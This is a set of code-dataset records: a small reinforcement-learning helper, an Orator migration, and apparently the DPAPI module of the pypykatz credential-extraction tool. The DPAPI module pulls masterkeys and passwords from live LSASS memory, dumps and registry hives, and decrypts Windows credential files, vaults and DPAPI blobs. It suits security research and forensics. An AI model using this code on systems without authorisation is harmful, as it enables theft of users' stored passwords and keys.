not_done_idx = []\n last_states = []\n for idx, exp in enumerate(batch):\n states.append(exp.state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(exp.last_state)\n states_v = ptan.agent.float32_preprocessor(states).to(device)\n actions_v = torch.FloatTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n if not_done_idx:\n last_states_v = ptan.agent.float32_preprocessor(last_states).to(device)\n last_vals_v = net(last_states_v)\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += last_val_gamma * last_vals_np\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_v, ref_vals_v\n\n\ndef test_net(net, env, count=10, device=\"cpu\"):\n \"\"\"Iterates through several episodes with no exploration or updates to test performance of current agent\n Args:\n net: network to be used for testing\n env: environment used\n count: number of episodes to run\n device: cpu or cuda\n\n Returns:\n average reward and average number of steps\n\n \"\"\"\n rewards = 0.0\n steps = 0\n for _ in range(count):\n obs = env.reset()\n while True:\n obs_v = ptan.agent.float32_preprocessor([obs]).to(device)\n mu_v = net(obs_v)[0]\n action = mu_v.squeeze(dim=0).data.cpu().numpy()\n action = np.clip(action, -1, 1)\n obs, reward, done, _ = env.step(action)\n rewards += reward\n steps += 1\n if done:\n break\n return rewards / count, steps / count\n\n\ndef run_test(net, env, device=\"cpu\"):\n ts = time.time()\n rewards, steps = test_net(net, env, device=device)\n print(\"Test done in %.2f sec, reward %.3f, steps %d\" % (\n time.time() - ts, rewards, steps))\n\n return rewards, steps\n","repo_name":"djbyrne/RL_Workbench","sub_path":"algos/actor_critic/ac_common.py","file_name":"ac_common.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69817134250","text":"from orator.migrations import Migration\n\n\nclass CreateFavoritesTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('favorites') as table:\n table.increments('id')\n\n table.integer('user_id').unsigned()\n table.foreign('user_id').references('id').on('users')\n\n table.integer('article_id').unsigned()\n table.foreign('article_id').references('id').on('articles')\n \n table.timestamps()\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('favorites')\n","repo_name":"vaibhavmule/masonite-realworld-example-app","sub_path":"databases/migrations/2019_01_21_035044_create_favorites_table.py","file_name":"2019_01_21_035044_create_favorites_table.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"20123724542","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n# \n# Kudos:\n# Processus Thief (@ProcessusT)\n#\n#\n\nimport os\nimport ntpath\nimport json\nimport hmac\nimport glob\nimport sqlite3\nimport base64\nimport platform\nfrom hashlib import sha1, pbkdf2_hmac\n\nimport xml.etree.ElementTree as ET\n\nfrom pypykatz import logger\nfrom pypykatz.dpapi.structures.masterkeyfile import MasterKeyFile\nfrom pypykatz.dpapi.structures.credentialfile import CredentialFile, CREDENTIAL_BLOB\nfrom pypykatz.dpapi.structures.blob import DPAPI_BLOB\nfrom pypykatz.dpapi.structures.vault import 
VAULT_VCRD, VAULT_VPOL, VAULT_VPOL_KEYS\nfrom unicrypto.hashlib import md4 as MD4\nfrom unicrypto.symmetric import AES, MODE_GCM, MODE_CBC\nfrom winacl.dtyp.wcee.pvkfile import PVKFile\nfrom pypykatz.commons.common import UniversalEncoder, base64_decode_url\n\n\nfrom cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15\n\n\nif platform.system().lower() == 'windows':\n\tfrom pypykatz.commons.winapi.processmanipulator import ProcessManipulator\n\n\"\"\"\nSo! DPAPI...\n\nIn order to decrypt a file/blob/data of any kind you must obtain a masterkey.\nMasterkey can be obtained either from the LSASS process, or by decrypting a masterkeyfile. LSASS is straightforward, successfully dumping it will give you all the plaintext masterkeys with the appropriate GUID.\n But if you can't use LSASS, you have to obtain the masterkey file, and decrypt it with an appropriate key. (too many keys, I know...)\n Masterkey files can be located in '%APPDATA%\\Microsoft\\Protect\\%SID%' for each user or '%SYSTEMDIR%\\Microsoft\\Protect' for the SYSTEM user. But how to decrypt them?\n A masterkeyfile can contain multiple different keys, a masterkey is one of them. The masterkey is stored encrypted in the masterkeyfile, and is encrypted with a key that can be either a key stored in registry (LSA secrets) or not. In case the LSA DPAPI keys are not valid, you will need to use the NT hash of the user's password or the user's plaintext password itself. BUT! deriving the key from the password and the SID will yield 3 different keys, and so far no one could tell which key is the correct one to be used.\n Solution for decrypting a masterkey in the masterkey file: harvest as many key candidates as possible and try to decrypt the masterkey. Much to our luck, verifying the signature data after decryption can tell us if the decryption was successful, so we can tell if the masterkey decrypted correctly or not.\n\nBut you may ask: I see a lot of different masterkey files, how can I tell which one is used for my <credential file/vault files/blob>? The answer: a masterkeyfile stores the GUID of the keys it stores (e.g. the masterkey), and so does your <secret> data structure for the appropriate key. Therefore it's easy to tell which file to decrypt for a given <secret>\n\nBUT WAIT! THERE IS MORE!\n\nDPAPI is also used to decrypt stored secrets in Windows Vault and Credential files.\nCredential files:\n\t1. standalone file, inside it there is a DPAPI_BLOB.\n\t2. DPAPI_BLOB can be decrypted with the corresponding masterkey\n\t3. After decryption you'll find a CREDENTIAL_BLOB structure.\n\t4. CREDENTIAL_BLOB structure has the plaintext secrets, but it's not possible to tell in which field they are stored. You'll need to check them by hand :)\n\t\nVault files (VCRD and VPOL):\n\tVCRD file holds the secrets encrypted. The decryption key is stored in the VPOL file, but also encrypted. The VPOL file's decryption key is a masterkey. The masterkey is stored in a Masterkeyfile...\n\t1. Need to find the masterkey to decrypt the VPOL file\n\t2. VPOL file will give two keys after successful decryption\n\t3. There is no way to tell (at the moment) which key will be the correct one to decrypt the VCRD file\n\t4. The VCRD file has a lot of stored secrets, called attributes. Each attribute is encrypted with one of the keys from the VPOL file\n\t5. For each attribute: for each key: decrypt attribute.\n\t6. Check manually if one of them succeeded because there are no integrity checks, so no way to tell programmatically which key worked.\n\t\nPath to decrypt stuff:\n\tSub-sections are options of how to get the keys\n\t\n\t1. pre_masterkey:\n\t\ta, from user password and SID\n\t\tb, from user NT hash and SID\n\t\tc, from live registry SYSTEM cached DPAPI key or SAM cache NT hash and SID\n\t\td, from offline registry hives\n\t\t\n\t2. masterkey:\n\t\ta, from masterkeyfile + pre_masterkey\n\t\tb, from live LSASS dump\n\t\tc, from offline LSASS dump\n\t\t\n\t3. credential file:\n\t\ta, masterkey + credential_file\n\t\t\n\t4. VPOL file:\n\t\ta, masterkey + VPOL file\n\t\t\n\t5. VCRD file:\n\t\ta, VPOL file + VCRD file\n\t\t\n\t6. DPAPI_BLOB:\n\t\ta, masterkey\n\nTODO: A LOT! currently fetching backupkeys from the DC is not supported, and probably missing a lot of things in the structure parsing :(\n\"\"\"\n\nclass DPAPI:\n\tdef __init__(self, use_winapi = False):\n\t\tself.use_winapi = use_winapi\n\t\tself.prekeys = {} #keys in bytes format stored in a dict for avoiding dupes\n\t\t\n\t\t#masterkey, backupkey\n\t\tself.masterkeys = {} #guid -> binary value\n\t\tself.backupkeys = {} #guid -> binary value\n\t\t\n\t\t#since so far I dunno how to match vault-keys to vaults, its a list :(\n\t\tself.vault_keys = []\n\t\n\n\tdef dump_pre_keys(self, filename = None):\n\t\tif filename is None:\n\t\t\tfor x in self.prekeys:\n\t\t\t\tprint(x.hex())\n\t\telse:\n\t\t\twith open(filename, 'w', newline = '') as f:\n\t\t\t\tfor x in self.prekeys:\n\t\t\t\t\tf.write(x.hex() + '\\r\\n')\n\n\tdef load_prekeys(self, filename):\n\t\ttry:\n\t\t\topen(filename, 'r')\n\t\texcept Exception as e:\n\t\t\tkey = bytes.fromhex(filename)\n\t\t\tself.prekeys[key] = 1\n\t\t\treturn\n\t\telse:\n\t\t\twith open(filename, 'r') as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tself.prekeys[bytes.fromhex(line)] = 1\n\n\tdef dump_masterkeys(self, filename = None):\n\t\tif filename is None:\n\t\t\tfor x in self.masterkeys:\n\t\t\t\tprint('[GUID] %s [MASTERKEY] %s' % (x, self.masterkeys[x].hex()))\n\t\t\tfor x in self.backupkeys:\n\t\t\t\tprint('[GUID] %s [BACKUPKEY] %s' % (x, self.backupkeys[x].hex()))\n\t\telse:\n\t\t\twith open(filename, 'w', newline = '') as f:\n\t\t\t\tt = { 'masterkeys' : self.masterkeys, 'backupkeys': self.backupkeys}\n\t\t\t\tf.write(json.dumps(t, cls = UniversalEncoder, indent=4, sort_keys=True))\n\n\tdef load_masterkeys(self, filename):\n\t\twith open(filename, 'r') as f:\n\t\t\tdata = json.loads(f.read())\n\t\t\n\n\t\tfor guid in data['backupkeys']:\n\t\t\tself.backupkeys[guid] = bytes.fromhex(data['backupkeys'][guid])\n\t\tfor guid in data['masterkeys']:\n\t\t\tself.masterkeys[guid] = bytes.fromhex(data['masterkeys'][guid])\n\n\t\t\n\tdef get_prekeys_from_password(self, sid, password = None, nt_hash = None):\n\t\t\"\"\"\n\t\tCreates pre-masterkeys from user SID and password or NT hash.\n\t\tIf NT hash is provided the function can only generate 2 out of the 3 possible keys, \n\t\tthis is because one of the derived keys relies on the SHA1 hash of the user password\n\t\t\n\t\tsid: user's SID as a string\n\t\tpassword: user's password. optional. if not provided, then NT hash must be provided\n\t\tnt_hash: user's NT hash. 
optional if not provided, the password must be provided\n\t\t\"\"\"\n\t\tif password is None and nt_hash is None:\n\t\t\traise Exception('Provide either password or NT hash!')\n\t\t\n\t\tif password is None and nt_hash:\n\t\t\tif isinstance(nt_hash, str):\n\t\t\t\tnt_hash = bytes.fromhex(nt_hash)\n\t\t\tkey1 = None\n\t\t\n\t\tif password or password == '':\n\t\t\tctx = MD4(password.encode('utf-16le'))\n\t\t\tnt_hash = ctx.digest()\n\n\t\t\t# Will generate two keys, one with SHA1 and another with MD4\n\t\t\tkey1 = hmac.new(sha1(password.encode('utf-16le')).digest(), (sid + '\\0').encode('utf-16le'), sha1).digest()\n\t\t\n\t\tkey2 = hmac.new(nt_hash, (sid + '\\0').encode('utf-16le'), sha1).digest()\n\t\t# For Protected users\n\t\ttmp_key = pbkdf2_hmac('sha256', nt_hash, sid.encode('utf-16le'), 10000)\n\t\ttmp_key_2 = pbkdf2_hmac('sha256', tmp_key, sid.encode('utf-16le'), 1)[:16]\n\t\tkey3 = hmac.new(tmp_key_2, (sid + '\\0').encode('utf-16le'), sha1).digest()[:20]\n\t\t\n\t\tif key1 is not None:\n\t\t\tself.prekeys[key1] = 1\n\t\tself.prekeys[key2] = 1\n\t\tself.prekeys[key3] = 1\n\t\t\n\t\tif key1 is not None:\n\t\t\tlogger.debug('Prekey_1 %s %s %s %s' % (sid, password, nt_hash, key1.hex()))\n\t\tlogger.debug('Prekey_2 %s %s %s %s' % (sid, password, nt_hash, key2.hex()))\n\t\tlogger.debug('Prekey_3 %s %s %s %s' % (sid, password, nt_hash, key3.hex()))\n\t\t\n\t\treturn key1, key2, key3\n\t\t\t\t\n\tdef __get_registry_secrets(self, lr):\n\t\t\"\"\"\n\t\tGets the pre-keys from an already parsed OffineRegistry or LiveRegistry object, populates the userkey/machinekey lists, returns the obtained keys\n\t\t\n\t\tlr: OffineRegistry or LiveRegistry object\n\t\treturn: touple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tuser = []\n\t\tmachine = []\n\t\tfrom pypykatz.registry.security.common import LSASecretDPAPI\n\n\t\tif lr.security:\n\t\t\tfor secret in lr.security.cached_secrets:\n\t\t\t\tif isinstance(secret, LSASecretDPAPI):\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)\n\t\t\t\t\tself.prekeys[secret.user_key] = 1\n\t\t\t\t\tuser.append(secret.user_key)\n\t\t\t\t\tself.prekeys[secret.machine_key] = 1\n\t\t\t\t\tmachine.append(secret.machine_key)\n\t\t\n\t\tif lr.sam is not None:\n\t\t\tfor secret in lr.sam.secrets:\n\t\t\t\tif secret.nt_hash:\n\t\t\t\t\tsid = '%s-%s' % (lr.sam.machine_sid, secret.rid)\n\t\t\t\t\tx, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)\n\t\t\t\t\tlogger.debug('[DPAPI] NT hash method. Calculated user key for user %s! 
\n\tdef __get_registry_secrets(self, lr):\n\t\t\"\"\"\n\t\tGets the pre-keys from an already parsed OffineRegistry or LiveRegistry object, populates the userkey/machinekey lists, returns the obtained keys\n\t\t\n\t\tlr: OffineRegistry or LiveRegistry object\n\t\treturn: tuple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tuser = []\n\t\tmachine = []\n\t\tfrom pypykatz.registry.security.common import LSASecretDPAPI\n\n\t\tif lr.security:\n\t\t\tfor secret in lr.security.cached_secrets:\n\t\t\t\tif isinstance(secret, LSASecretDPAPI):\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)\n\t\t\t\t\tself.prekeys[secret.user_key] = 1\n\t\t\t\t\tuser.append(secret.user_key)\n\t\t\t\t\tself.prekeys[secret.machine_key] = 1\n\t\t\t\t\tmachine.append(secret.machine_key)\n\t\t\n\t\tif lr.sam is not None:\n\t\t\tfor secret in lr.sam.secrets:\n\t\t\t\tif secret.nt_hash:\n\t\t\t\t\tsid = '%s-%s' % (lr.sam.machine_sid, secret.rid)\n\t\t\t\t\tx, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)\n\t\t\t\t\tlogger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))\n\t\t\t\t\tuser.append(key2)\n\t\t\t\t\tuser.append(key3)\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\treturn user, machine\n\t\n\tdef get_prekeys_form_registry_live(self):\n\t\t\"\"\"\n\t\tObtains pre-keys from the live registry (SECURITY/SAM hives).\n\t\treturn: tuple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tfrom pypykatz.registry.live_parser import LiveRegistry\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = LiveRegistry.go_live()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('[DPAPI] Failed to obtain registry secrets via direct registry reading method')\n\t\t\ttry:\n\t\t\t\tlr = OffineRegistry.from_live_system()\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('[DPAPI] Failed to obtain registry secrets via filedump method')\n\t\t\n\t\tif lr is not None:\n\t\t\treturn self.__get_registry_secrets(lr)\n\n\t\telse:\n\t\t\traise Exception('Registry parsing failed!')\n\t\t\t\n\tdef get_prekeys_form_registry_files(self, system_path, security_path, sam_path = None):\n\t\t\"\"\"\n\t\tObtains pre-keys from offline registry hive files.\n\t\treturn: tuple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = OffineRegistry.from_files(system_path, sam_path = sam_path, security_path = security_path)\n\t\texcept Exception as e:\n\t\t\tlogger.error('[DPAPI] Failed to obtain registry secrets via direct registry reading method. Reason: %s' %e)\n\t\t\n\t\tif lr is not None:\n\t\t\treturn self.__get_registry_secrets(lr)\n\n\t\telse:\n\t\t\traise Exception('[DPAPI] Registry parsing failed!')\n\t\t\t\n\tdef get_all_keys_from_lsass_live(self):\n\t\t\"\"\"\n\t\tParses the live LSASS process and extracts the plaintext masterkeys, and also generates prekeys from all available credentials\n\t\tIt does not return anything, just sets up all key material in the object\n\t\treturn: None\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.go_live()\n\t\tsids = [katz.logon_sessions[x].sid for x in katz.logon_sessions]\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\t\t\t\n\t\t\tfor package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():\n\t\t\t\tif package.lower() == 'dpapi':\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tsids = [katz.logon_sessions[x].sid]\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif plaintext is not None:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)\n\t\t\t\t\tif nthex is not None and len(nthex) == 32:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = None, nt_hash = nthex)\n\t\t\t\t\n\t\t\t\tif shahex is not None and len(shahex) == 40:\n\t\t\t\t\tself.prekeys[bytes.fromhex(shahex)] = 1\n\t\t\t\n\tdef get_masterkeys_from_lsass_live(self):\n\t\t\"\"\"\n\t\tParses the live LSASS process and extracts the plaintext masterkeys\n\t\t\n\t\treturn: dictionary of guid->keybytes\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.go_live()\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\t\t\n\t\treturn self.masterkeys\n\t\t\t\t
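\n\t# Usage sketch (illustrative only; both LSASS helpers need admin rights on a live system):\n\t#   dpapi = DPAPI()\n\t#   dpapi.get_all_keys_from_lsass_live()      # masterkeys + prekeys in one pass\n\t#   dpapi.dump_masterkeys('masterkeys.json')  # cache the results for offline use (filename is a placeholder)\n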
\n\tdef get_masterkeys_from_lsass_dump(self, file_path):\n\t\t\"\"\"\n\t\tParses the minidump of an LSASS process file and extracts the plaintext masterkeys, and also generates prekeys from all available credentials\n\t\t\n\t\tfile_path: path to the minidump file\n\t\treturn: dictionary of guid->keybytes\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.parse_minidump_file(file_path)\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\n\t\t\t# indentation fixed: this loop belongs inside the session loop, mirroring get_all_keys_from_lsass_live\n\t\t\tfor package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():\n\t\t\t\tif package.lower() == 'dpapi':\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tsids = [katz.logon_sessions[x].sid]\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif plaintext is not None:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)\n\t\t\t\t\tif nthex is not None and len(nthex) == 32:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = None, nt_hash = nthex)\n\t\t\t\t\n\t\t\t\tif shahex is not None and len(shahex) == 40:\n\t\t\t\t\tself.prekeys[bytes.fromhex(shahex)] = 1\n\t\t\t\t\n\t\treturn self.masterkeys\n\n\tdef decrypt_masterkey_file_with_pvk(self, mkffile, pvkfile):\n\t\t\"\"\"\n\t\tDecrypts the masterkeyfile using the domain backup key in .pvk format\n\t\t\"\"\"\n\t\twith open(mkffile, 'rb') as fp:\n\t\t\tdata = fp.read()\n\t\tmkf = MasterKeyFile.from_bytes(data)\n\t\tdk = mkf.domainkey.secret\n\t\tprivkey = PVKFile.from_file(pvkfile).get_key()\n\t\tdecdk = privkey.decrypt(dk[::-1], PKCS1v15())\n\t\tsecret = decdk[8:72] # TODO: proper file format would be good here!!!\n\t\tself.masterkeys[mkf.guid] = secret\n\t\treturn self.masterkeys\n\t\t\t\n\tdef decrypt_masterkey_file(self, file_path, key = None):\n\t\t\"\"\"\n\t\tDecrypts Masterkeyfile\n\t\tfile_path: path to Masterkeyfile\n\t\tkey: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.\n\t\treturns: tuple of two dictionaries, see decrypt_masterkey_bytes\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_masterkey_bytes(f.read(), key = key)\n\t
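\n\t# Sketch of the two masterkey decryption paths (file names are placeholders):\n\t#   dpapi.decrypt_masterkey_file('<masterkeyfile>')  # tries every cached prekey\n\t#   dpapi.decrypt_masterkey_file_with_pvk('<masterkeyfile>', '<backupkey.pvk>')  # domain backup key\n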
\n\tdef decrypt_masterkey_bytes(self, data, key = None):\n\t\t\"\"\"\n\t\tDecrypts Masterkeyfile bytes\n\t\tdata: bytearray of the masterkeyfile\n\t\tkey: bytes describing the key used for decryption\n\t\treturns: tuple of dictionaries. [0] -> masterkey[guid] = key, [1] -> backupkey[guid] = key\n\t\t\"\"\"\n\t\tmkf = MasterKeyFile.from_bytes(data)\n\t\tmks = {}\n\t\tbks = {}\n\t\tif mkf.masterkey is not None:\n\t\t\tif mkf.guid in self.masterkeys:\n\t\t\t\tmks[mkf.guid] = self.masterkeys[mkf.guid]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tfor user_key in self.prekeys:\n\t\t\t\t\tdec_key = mkf.masterkey.decrypt(user_key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tlogger.debug('user key win: %s' % user_key.hex())\n\t\t\t\t\t\tself.masterkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tmks[mkf.guid] = dec_key\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif key is not None:\n\t\t\t\t\tdec_key = mkf.masterkey.decrypt(key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.masterkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tmks[mkf.guid] = dec_key\n\t\t\n\t\tif mkf.backupkey is not None:\n\t\t\tif mkf.guid in self.backupkeys:\n\t\t\t\tbks[mkf.guid] = self.backupkeys[mkf.guid]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tfor user_key in self.prekeys:\n\t\t\t\t\tdec_key = mkf.backupkey.decrypt(user_key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.backupkeys[mkf.guid] = dec_key\n\t\t\t\t\t\tbks[mkf.guid] = dec_key\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif key is not None:\n\t\t\t\t\tdec_key = mkf.backupkey.decrypt(key)\n\t\t\t\t\tif dec_key:\n\t\t\t\t\t\tself.backupkeys[mkf.guid] = dec_key # fixed: backup keys were stored in self.masterkeys here\n\t\t\t\t\t\tbks[mkf.guid] = dec_key\n\t\t\t\t\t\n\t\treturn mks, bks\n\t\n\tdef decrypt_credential_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts CredentialFile\n\t\tfile_path: path to CredentialFile\n\t\treturns: CREDENTIAL_BLOB object\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_credential_bytes(f.read())\n\t\n\tdef decrypt_credential_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts CredentialFile bytes\n\t\tCredentialFile holds one DPAPI blob, so the decryption is straightforward, and it also has a known structure for the cleartext.\n\t\tNote that the resulting CREDENTIAL_BLOB structure's fields can hold the secrets under weird field names like \"unknown\"\n\t\t\n\t\tdata: CredentialFile bytes\n\t\treturns: CREDENTIAL_BLOB object\n\t\t\"\"\"\n\t\tcred = CredentialFile.from_bytes(data)\n\t\tdec_data = self.decrypt_blob_bytes(cred.data)\n\t\tcb = CREDENTIAL_BLOB.from_bytes(dec_data)\n\t\treturn cb\n\t\t
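\n\t# Usage sketch (the path is a placeholder): once a matching masterkey is cached,\n\t# a credential file decrypts in one call:\n\t#   blob = dpapi.decrypt_credential_file('<path to CredentialFile>')\n\t#   print(str(blob))\n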
\n\tdef decrypt_blob(self, dpapi_blob, key = None):\n\t\t\"\"\"\n\t\tDecrypts a DPAPI_BLOB object\n\t\tThe DPAPI blob has a GUID attribute which indicates the masterkey to be used; it also has integrity check bytes, so it is possible to tell if decryption was successful.\n\t\t\n\t\tdpapi_blob: DPAPI_BLOB object\n\t\tkey: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.\n\t\treturns: bytes of the cleartext data\n\t\t\"\"\"\n\t\tif key is None:\n\t\t\tlogger.debug('[DPAPI] Looking for master key with GUID %s' % dpapi_blob.masterkey_guid)\n\t\t\tif dpapi_blob.masterkey_guid not in self.masterkeys:\n\t\t\t\traise Exception('No matching masterkey was found for the blob!')\n\t\t\tkey = self.masterkeys[dpapi_blob.masterkey_guid]\n\t\treturn dpapi_blob.decrypt(key)\n\t\t\n\tdef decrypt_blob_bytes(self, data, key = None):\n\t\t\"\"\"\n\t\tDecrypts DPAPI_BLOB bytes.\n\t\t\n\t\tdata: DPAPI_BLOB bytes\n\t\treturns: bytes of the cleartext data\n\t\t\"\"\"\n\t\tif self.use_winapi is True:\n\t\t\tfrom pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData\n\t\t\treturn CryptUnprotectData(data)\n\t\t\n\t\tblob = DPAPI_BLOB.from_bytes(data)\n\t\tlogger.debug(str(blob))\n\t\treturn self.decrypt_blob(blob, key = key)\n\t\t\n\tdef decrypt_vcrd_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts a VCRD file\n\t\tLocation: %APPDATA%\\Local\\Microsoft\\Vault\\%GUID%\\<>.vcrd\n\t\t\n\t\tfile_path: path to the vcrd file\n\t\treturns: dictionary of attributes as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_vcrd_bytes(f.read())\n\t\t\t\n\tdef decrypt_vcrd_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts VCRD file bytes.\n\t\t\n\t\tdata: VCRD file bytes\n\t\treturns: dictionary of attributes as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\tvv = VAULT_VCRD.from_bytes(data)\n\t\treturn self.decrypt_vcrd(vv)\n\t\t
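\n\t# Ordering note (sketch; paths are placeholders): VCRD attributes decrypt with the\n\t# keys recovered from the VPOL file, so the VPOL must be processed first:\n\t#   dpapi.decrypt_vpol_file('<Vault dir>/Policy.vpol')  # fills self.vault_keys\n\t#   res = dpapi.decrypt_vcrd_file('<Vault dir>/<guid>.vcrd')\n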
\n\tdef decrypt_vcrd(self, vcrd):\n\t\t\"\"\"\n\t\tDecrypts the attributes found in a VCRD object, and returns the cleartext data candidates\n\t\tA VCRD file can have a lot of stored credentials inside, most of them with a custom data structure\n\t\tIt is not possible to tell if the decryption was successful, so treat the result accordingly\n\t\t\n\t\tvcrd: VAULT_VCRD object\n\t\treturns: dictionary of attributes as key, and a list of possible decrypted data\n\t\t\"\"\"\n\t\t\n\t\tdef decrypt_attr(attr, key):\n\t\t\tif attr.data is not None:\n\t\t\t\tif attr.iv is not None:\n\t\t\t\t\tcipher = AES(key, MODE_CBC, attr.iv)\n\t\t\t\telse:\n\t\t\t\t\tcipher = AES(key, MODE_CBC, b'\\x00'*16)\n\t\t\t\t\n\t\t\t\tcleartext = cipher.decrypt(attr.data)\n\t\t\t\treturn cleartext\n\t\t\n\t\tres = {}\n\t\tfor i, key in enumerate(self.vault_keys):\n\t\t\tfor attr in vcrd.attributes:\n\t\t\t\tcleartext = decrypt_attr(attr, key)\n\t\t\t\tif attr not in res:\n\t\t\t\t\tres[attr] = []\n\t\t\t\tres[attr].append(cleartext)\n\t\treturn res\n\t\t\t\t\t\n\tdef decrypt_vpol_bytes(self, data):\n\t\t\"\"\"\n\t\tDecrypts the VPOL file, and returns the two keys' bytes\n\t\tA VPOL file stores two encryption keys.\n\t\t\n\t\tdata: bytes of the VPOL file\n\t\treturns: tuple of bytes, describing two keys\n\t\t\"\"\"\n\t\tvpol = VAULT_VPOL.from_bytes(data)\n\t\tres = self.decrypt_blob_bytes(vpol.blobdata)\n\t\t\n\t\tkeys = VAULT_VPOL_KEYS.from_bytes(res)\n\t\t\n\t\tself.vault_keys.append(keys.key1.get_key())\n\t\tself.vault_keys.append(keys.key2.get_key())\n\t\t\n\t\treturn keys.key1.get_key(), keys.key2.get_key()\n\t\t\n\tdef decrypt_vpol_file(self, file_path):\n\t\t\"\"\"\n\t\tDecrypts a VPOL file\n\t\tLocation: %APPDATA%\\Local\\Microsoft\\Vault\\%GUID%\\<>.vpol\n\t\t\n\t\tfile_path: path to the vpol file\n\t\treturns: tuple of bytes, describing two keys\n\t\t\"\"\"\n\t\twith open(file_path, 'rb') as f:\n\t\t\treturn self.decrypt_vpol_bytes(f.read())\n\n\tdef decrypt_securestring_bytes(self, data):\n\t\treturn self.decrypt_blob_bytes(data)\n\t\t\n\tdef decrypt_securestring_hex(self, hex_str):\n\t\treturn self.decrypt_securestring_bytes(bytes.fromhex(hex_str))\n\t\n\tdef decrypt_securestring_file(self, file_path):\n\t\twith open(file_path, 'r') as f:\n\t\t\tdata = f.read()\n\t\treturn 